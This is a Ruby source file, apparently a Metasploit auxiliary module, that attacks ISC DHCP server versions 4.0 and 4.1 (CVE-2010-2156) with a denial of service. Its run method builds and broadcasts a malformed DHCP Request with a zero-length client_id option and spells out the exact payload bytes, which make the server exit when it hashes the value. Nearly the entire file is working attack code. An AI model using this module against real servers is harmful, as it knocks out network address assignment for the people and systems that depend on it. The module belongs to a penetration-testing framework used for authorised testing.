Path: blob/master/modules/auxiliary/dos/dhcp/isc_dhcpd_clientid.rb
19567 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Auxiliary6include Msf::Auxiliary::Dos7include Msf::Exploit::Capture89def initialize10super(11'Name' => 'ISC DHCP Zero Length ClientID Denial of Service Module',12'Description' => %q{13This module performs a Denial of Service Attack against the ISC DHCP server,14versions 4.1 before 4.1.1-P1 and 4.0 before 4.0.2-P1. It sends out a DHCP Request15message with a 0-length client_id option for an IP address on the appropriate range16for the dhcp server. When ISC DHCP Server tries to hash this value it exits17abnormally.18},19'Author' => [20'sid', # Original POC21'theLightCosine' # msf module22],23'License' => MSF_LICENSE,24'References' => [25[ 'CVE', '2010-2156' ],26[ 'OSVDB', '65246'],27[ 'EDB', '14185']28],29'Notes' => {30'Stability' => [CRASH_SERVICE_DOWN],31'SideEffects' => [],32'Reliability' => []33}34)35register_options(36[37OptAddress.new('RIP', [true, 'A valid IP to request from the server'])38]39)40deregister_options('FILTER', 'PCAPFILE', 'SNAPLEN', 'TIMEOUT')41end4243def run44open_pcap45print_status('Creating DHCP Request with 0-length ClientID')46p = PacketFu::UDPPacket.new47p.ip_daddr = '255.255.255.255'48p.udp_sport = 6849p.udp_dport = 675051# TODO: Get a DHCP parser into PacketFu52chaddr = "\xaa\xaa\xaa\xaa\xaa\xaa"53dhcp_payload = "\x63\x82\x53\x63\x35\x01\x03\x3d\x00\xff"54p.payload = dhcp_req(chaddr, dhcp_payload)55p.recalc56print_status('Sending malformed DHCP request...')57capture_sendto(p, '255.255.255.255')58close_pcap59end6061def dhcp_req(chaddr, payload)62req = "\x00" * 23663req[0, 3] = "\x01\x01\x06" # Boot request on Eth with hw len of 664req[12, 4] = Rex::Socket.addr_aton(datastore['RIP'])65req[28, 6] = chaddr66req + payload67end68end697071